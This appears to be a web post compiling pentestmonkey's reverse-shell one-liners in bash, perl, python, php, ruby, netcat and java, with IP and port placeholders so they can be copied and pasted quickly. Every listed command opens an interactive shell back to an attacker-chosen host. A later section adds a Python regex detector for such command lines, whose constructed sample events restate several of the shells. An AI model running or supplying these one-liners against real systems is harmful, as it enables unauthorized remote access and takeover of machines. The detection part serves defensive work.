Reverse Shells
All of the following reverse shells are originally from pentestmonkey. The purpose of this post is to build these reference shells dynamically with your desired IP and port, so that copying and pasting is quick and easy. In the commands below, {{USER_IP}} and {{USER_PORT}} are the placeholders for those two values.
bash
bash -i >& /dev/tcp/{{USER_IP}}/{{USER_PORT}} 0>&1
perl
perl -e 'use Socket;$i="{{USER_IP}}";$p={{USER_PORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{USER_IP}}",{{USER_PORT}}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("{{USER_IP}}",{{USER_PORT}});exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("{{USER_IP}}",{{USER_PORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
netcat
nc -e /bin/sh {{USER_IP}} {{USER_PORT}}
netcat 2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{USER_IP}} {{USER_PORT}} >/tmp/f
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{{USER_IP}}/{{USER_PORT}};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
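Detection-side companion to the one-liners above, as an added example that is not from the original post or from pentestmonkey: it matches process-creation command lines against the traits these shells share. The rule names, the event fields and the sample events (192.0.2.10 is a documentation address) are constructed for illustration.

```python
import re

# Each rule keys on a trait the one-liners above share: a TCP connection opened
# from a command-line argument with a shell attached to it.
# Rule names are hypothetical, chosen for this example.
RULES = [
    # bash entry, and the child /bin/bash spawned by the java entry
    ("dev-tcp-redirect", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # "netcat" entry: nc with an exec flag pointing at a shell
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*e\s+\S*sh\b")),
    # "netcat 2" entry: named pipe feeding a shell that feeds nc
    ("fifo-netcat", re.compile(r"\bmkfifo\b.*\|\s*(?:nc|ncat|netcat)\b")),
    # perl / python / php / ruby entries: inline code, a socket call and a shell
    ("interp-socket-shell", re.compile(
        r"\b(?:perl|python[\d.]*|php|ruby)\b.*\s-[ecr].*"
        r"(?:socket|fsockopen|TCPSocket).*/bin/(?:ba)?sh")),
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Return (pid, rules) for each process-creation event that matches."""
    return [(e["pid"], hits) for e in events if (hits := classify(e["cmdline"]))]

# Constructed process-creation events (argv joined with spaces), not real logs.
SAMPLE_EVENTS = [
    {"pid": 4101, "cmdline": "bash -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"},
    {"pid": 4102, "cmdline": "nc -e /bin/sh 192.0.2.10 4444"},
    {"pid": 4103, "cmdline": "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i "
                             "2>&1|nc 192.0.2.10 4444 >/tmp/f"},
    {"pid": 4104, "cmdline": 'python -c import socket,subprocess,os;s=socket.socket();'
                             's.connect(("192.0.2.10",4444));os.dup2(s.fileno(),0);'
                             'subprocess.call(["/bin/sh","-i"])'},
    # Benign look-alikes that must not alert.
    {"pid": 4105, "cmdline": "nc -zv 192.0.2.10 443"},
    {"pid": 4106, "cmdline": 'python3 -c import json,sys;'
                             'print(json.load(sys.stdin)["version"])'},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS):
        print(pid, ",".join(hits))
```

Command-line matching is a first-pass signal. The behaviour all of these entries share is a shell whose standard input, output and error are a TCP socket, which is the stronger thing to alert on where process and network telemetry can be joined.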